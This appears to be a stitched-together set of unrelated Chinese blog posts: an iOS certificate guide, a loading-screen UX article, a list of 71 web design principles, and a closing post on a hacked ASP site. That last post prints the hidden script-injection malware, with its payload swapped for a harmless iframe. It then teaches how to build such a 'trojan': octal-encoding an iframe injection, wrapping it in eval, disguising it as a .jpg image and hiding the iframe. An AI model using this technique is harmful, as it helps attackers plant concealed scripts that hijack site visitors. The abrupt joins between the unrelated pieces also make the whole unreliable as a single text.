本文是一个初学者对苹果开发证书的理解，有一定局限性，不适合所有苹果开发者参考，欢迎批评指正。

 

发布 iOS 应用主要有三块内容：Certificates, Identifiers & Profiles

Certificates（证书）：是用来给应用程序签名的

Identifiers（标识符）：一个应用对应一个 ID，相当于应用程序的身份证

Provisioning Profiles（描述文件）：它将证书、标识符、设备结合起来，形成一个描述文件，让 Xcode 知道需要打一个怎么样的 .ipa 包

 

如何创建证书

创建 App ID 就不详说了，不要使用带通配符的名称。值得一提的是，如果要使用推送，必须勾选“Push Notifications”，其它功能按需勾选。

创建证书，需要用到 Mac 电脑上的“钥匙串访问”来生成一个“本地证书”（CSR 文件）：

打开“钥匙串访问” - 证书助理 - 从证书颁发机构请求证书 - 保存到磁盘

然后就可以拿这个本地证书去 Apple Developer 里生成“开发证书”或“发布证书”（CER 文件）。打包证书和推送证书生成过程类似，区别是选择“App Store and Ad Hoc”还是“Apple Push Notification service SSL”。下载后添加到钥匙串就完成了。

添加测试设备就不提了。

然后就是描述文件，同样有开发和发布两种。开发主要是用于 Xcode 环境中；发布中还分两种：App Store 是用于正式上线的，Ad Hoc 是用于测试设备的。下一步选择 App ID，下一步选择证书，然后给 Profile 取个能够分辨的名字，生成的是一个 mobileprovision 文件。

 

提供证书文件给第三方打包平台

一般需要提供“iOS Distribution 证书”、“推送证书”、“Ad Hoc”和“App Store”类型的 Profiles、App ID 以及 iTunes Connect 中的 Apple ID（不是指登录的邮箱，是指在 iTunes Connect 中创建的 App 在商店中的 ID）。

证书其实跟 App ID 不是一一对应的关系，多个 App 是可以使用同一个证书的。可以单独创建，到期互不影响。Download 后是 .cer 格式，用“钥匙串”工具可以导出 .p12 证书并设置密码。

如果由于命名无序或创建错误导致无法分辨上架中的 App 用的是哪个证书，哪个描述文件，那么，首先要知道这个 App ID 是多少（就是 iTunes Connect 中所谓的“套装 ID”），然后在 Provisioning Profiles 中挨个查看对应的 App ID，点击“Edit”还能看到使用的证书。

有些平台需要 .pem 文件，是由 .p12 文件通过一个命令转化而来的，具体可以百度。

 

证书过期怎么办

创建一个呗，然后描述文件 Edit，选择新的证书。

 

推送证书过期怎么办

在 App ID 里 Edit 就能查看 Push Notifications 项的 SSL Certificate 是否过期。如果过期需要重新创建证书，可以直接在 App ID 的 Edit 里快捷创建（需要“钥匙串”配合）。

不用重新提交 App Store 审核

 

换一台电脑，证书要怎么导过去

这个问题适用于自己使用 Xcode 开发应用的情况，暂时问一下百度吧。

 

注：本文部分总结来自百度，未经证实。

Apple Push Services 和 APNs Production iOS 这两种类型有什么区别？

编者按：本文作者 Nick Babich 在文中介绍了几种 “提高” 加载速度的方法。

当我们设计产品的时候，我们没有办法模拟不同的加载速度。因此如果用户等待太长的时间才能看到内容，并不是我们特意的安排。

网速不稳定，尤其是当我们加载图片或音乐时，时间会较长。在这种情况下，我们不得不考虑在这种间隙向用户展示什么内容才能让他们感觉不枯燥。

加载动图（Spinner）效果不佳

加载 Spinner 并不是暗示加载或思考的正确方式。默认加载图标（例如 iOS 的加载动画效果是从中心点辐射的灰色线条）通常具有消极的含义。它们应用于多种操作系统功能之中，包括设备启动、连接到网络或者加载数据。

人们讨厌只看到加载 Spinner，但是却看不多进度或时间。让用户盯着一个下载进度条或者旋转圈会让跳出率提高。

不确定的等待时间比已知的、有限的等待时间让人觉得更长。你应该给你的用户一个清晰地等待时间。

进度条可以告诉用户这个过程需要花费多长时间，但是一般不太正确。你可以通过一些方法隐藏过程中的延迟，例如你可以在开始的时候让速度显示地快一点，在结尾的时候，显示速度慢一点。进度条不应该中断，否则用户就会认为这个 App 卡住了。

后台操作

在后台操作中包含行为有两个优点——用户可见；在用户真正发出请求时就会加载完毕。当程序在后台运营时，给用户呈现一些其他的内容。一个很好的案例是在 Instagram 中加载图片。用户一旦选择想要分享的图片，就开始加载。

在后台加载图片的过程中，Instagram 邀请用户添加标题和标签，当用户准备按 “分享” 键时，加载过程就完成了，这时候就可以立刻分享图片了。

仿真内容和 Placeholder（占位符）

如果你无法缩短加载时间，那么你应该试图让用户在等待中更高兴一点。可以利用这个时间显示一些临时的信息。为了提高用户的参与度，可以使用仿真内容作为文本和图片。

几点小建议：

1、加载屏幕不应该太亮。不需要太吸引眼球。Facebook 的灰色 Placeholder 就是一个很好的例子。当加载内容时使用模板元素，让用户熟悉将要加载的内容的整体结构。

2、如果要加载图片，你可以在 placeholder 中使用加载图片的主色调。Medium 的图片加载效果比较好。首先加载一个小型的模糊图片，然后转化成一个清晰的大图片。

使用 placeholder 和仿真内容并没有加快加载过程，但是在用户眼中加载速度好像变快了。

分散用户的注意力

为了不让用户在等待时感到枯燥，可以适当分散他们的注意力。你可以使用一些有趣的、始料未及的东西吸引用户的注意力，为 App 加载赢得充足的时间。

动画片可以分散访客的注意力，让他们忽略加载时间。

结论

用户讨厌等待，如果你让用户觉得他们没有等待，那么他们就会喜欢你的 App。一定要让用户觉得 App 的加载时间比他预计的短。

去年，我们分享了《40个良好用户界面Tips》，对设计师来说确实很有帮助，今年，Goodui.org已经更新至71条，这些原则都是由Goodui官方精心整理，认为这些都是非常重要的设计要点，所以对于设计师来说，建议学习一下。

01 尝试使用一列的布局替代多列布局

02 给用户一些小的利益，别看上去那么赤裸裸

03 合并相似的功能

04 尝试展示来自用户的赞扬，而不是自我表扬

05 重复核心行动点

06 统一视觉规范，提升可识别性

07 尝试使用推荐的口吻，而不是让用户感觉面对一台冷冰冰的机器

08 给用户吃「后悔药」的机会

09 告诉用户产品适用的人群，而不是人人都通用

10 将文案写得更加的直接，而不是一堆废话

11 增强主行动点的视觉冲击力，提升它在页面中的可对比性

12 让用户知道你从哪儿来更易于拉近与用户的关系

13 将表单做的简单点，确保用户在抓狂之前能进入下一步

14 尽量将用户需要选择的信息展示出来而不是藏起来

15 页面的排版需要考虑用户是否会漏掉底部信息

16 如果页面的底部有需要关注的行动点，别让文中过多的外链带走了用户

17 确保用户知道自己目前的状态

18 将利益点融合在行动点中，增强用户的点击欲望

19 将行动点与当前信息结合起来

20 将简要的表单合并到页面中，减少调整页面带来的用户流失

21 适当的增加延迟动效，让用户感知到页面的变化

22 让新用户从尝试产品入手，而不是一来就面对冷冰冰的注册表单

23 减少使用线框，这会过多的吸引用户注意力，而且会让页面看上去透不过气

24 给用户推销你能给他带来的利益，而不是功能

25 一定要注意0结果页面的设计，这也是引导用户的好地方

26 给用户选择退出的权利，特别是邮件订阅

27 注意界面元素的一致性，降低用户学习成本

28 给下拉框增加一些预设值，降低用户填写成本

29 延续用户日常的使用习惯，而不是重新创造

30 尝试告诉用做些事情降低自己的损失，而不是提升收益

31 提升页面的视觉层次，增强可阅读性

32 将同类的操作合并在一起，降低用户的认知成本

33 表单及时校验，而不是统一提交后在告诉用户填错了

34 尝试将表单输入变得更加宽容，让用户的填写更加简单

35 通过时间增强紧迫感

36 提供用户可预见性的操作，降低用户的心理成本

37 尽可能的帮助用户选择，而不是让用户想破脑袋

38 尽可能将操作区域放大，降低用户操作成本

39 页面加载速度很重要，尽可能让用户感受到你的网站速度很快

40 如果可以，增加键盘快捷键，提升操作效率

41 尝试通过对比来让用户感知到性价比

42 尝试对进度条进行「设计」来降低用户等待的焦虑

43 根据用户选择逐步展示信息，降低无效信息对用户的干扰

44 有时候较小的承诺比「夸海口」会更容易让用户信服

45 尝试将提示信息弱化，减少对用户操作的干扰

46 尽量通过系统的功能来简化用户的操作

47 用文本配合图标来降低用户的认知成本

48 用更自然的语言代替冷冰冰的机器

49 放出一些摘要信息来帮助用户识别是否需要进一步了解

50 在关键的页面增加用户权益信息，增强用户进一步操作的信心

51 将价格进行换算，让用户感觉这很便宜

52 记得在成功页面感谢用户

53 将数字转化成易于用户阅读的形式，而不是冷冰冰的机器语言

54 告诉用户选择的权利和自由「诱惑力」

55 尝试让语言更具「诱惑力」

56 通过设计引导用户的注意力

57 通过友好的对比来展示产品，为用户做决定提供帮助

58 通过任务机制来提升用户的满足感

59 让用户了解接下来将要发生什么事情

60 尝试用更幽默一些的语言文案

61 任何操作之后都要给出反馈，让用户知道操作已经生效

62 注意动效的真实使用情况（Amazon 的类目菜单就是一个很好的例子）

63 注意排版的，不要让信息过于拥挤

64 尝试用讲故事的方式来传递信息，增强用户的代入感

65 尽量给用户展示真实的信息，不要欺骗

66 随着用户的不断熟悉简化界面

67 试着用用户的口吻展示信息

68 在表单中增加一些提示信息，减少错误的几率

69 用简单的文案传递核心关注的信息，少一些废话

70 尝试使用响应式布局

71 视觉表达要清晰，而不是模棱两可

这71条设计原则虽然针对 Web 设计，但有些部分在移动产品设计中同样有效。翻译过程只保留了图片和标题，更多详细内容可以访问 GoodUI 官网：

http://goodui.org/

今天访问某 asp 网站时发现不对劲，一看源文件原来网页被挂马了，仔细查看源代码发现：

<script>document.write("<scri");</script>pt src="images/banner.jpg"></script>

这段代码调用了 banner.jpg 这个 js 文件。用记事本打开这个文件发现以下内容：（木马内容已替换成安全内容）

eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\170\157\171\157\172\157\56\155\145\76\74\57\151\146\162\141\155\145\76\47\51")

代码非常整齐，立刻怀疑是 ascii 码的八进制代码。于是解码之，就看到了：（木马内容已替换成安全内容）

document.write('<iframe src=https://xoyozo.net></iframe>')

至此，整个流程已非常清晰了。

八进制转化为十进制

var a = '144';
alert(parseInt(a, 8));  // 输出为 100

十进制转化为八进制

var a = 100;
alert(a.toString(8)); // 输出为 144

ASCII 码转化为字符

var a = 100;
alert(String.fromCharCode(a));  // 输出为 d

字符转化为 ASCII 码

var a = "d";
alert(a.charCodeAt(a));  // 输出为 100

如果用 alert 直接输出编码后的代码，看到的却是原码，下面提供HTML编码和解码：

function HTMLEncode(input) {
  var converter = document.createElement("DIV");
  converter.innerText = input;
  var output = converter.innerHTML;
  converter = null;
  return output;
}

function HTMLDecode(input) {
  var converter = document.createElement("DIV");
  converter.innerHTML = input;
  var output = converter.innerText;
  converter = null;
  return output;
}

您可以比较一下区别：

var a = "document.write('<iframe src=https://xoyozo.net></iframe>')";
document.write(a);

var a = "document.write('<iframe src=https://xoyozo.net></iframe>')";
document.write(HTMLEncode(a));

现在完全可以实现宿主页面执行嵌套 iframe 的效果了。如果需要更隐蔽，可以给 <iframe/> 加上尺寸属性。下面一起来制作一个简单的木马：把

document.write('<iframe src=https://xoyozo.net></iframe>')

编码为

\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\170\157\171\157\172\157\56\155\145\76\74\57\151\146\162\141\155\145\76\47\51

的代码为

var a = "document.write('<iframe src=https://xoyozo.net></iframe>')";
var b = "";
for (var i = 0; i < a.length; i++) {
  b += "\\" + a.charCodeAt(i).toString(8);
}
document.write(HTMLEncode(b));

然后加上 eval() 方法，保存为 .jpg 文件，再通过文章开始介绍的方法调用就行了。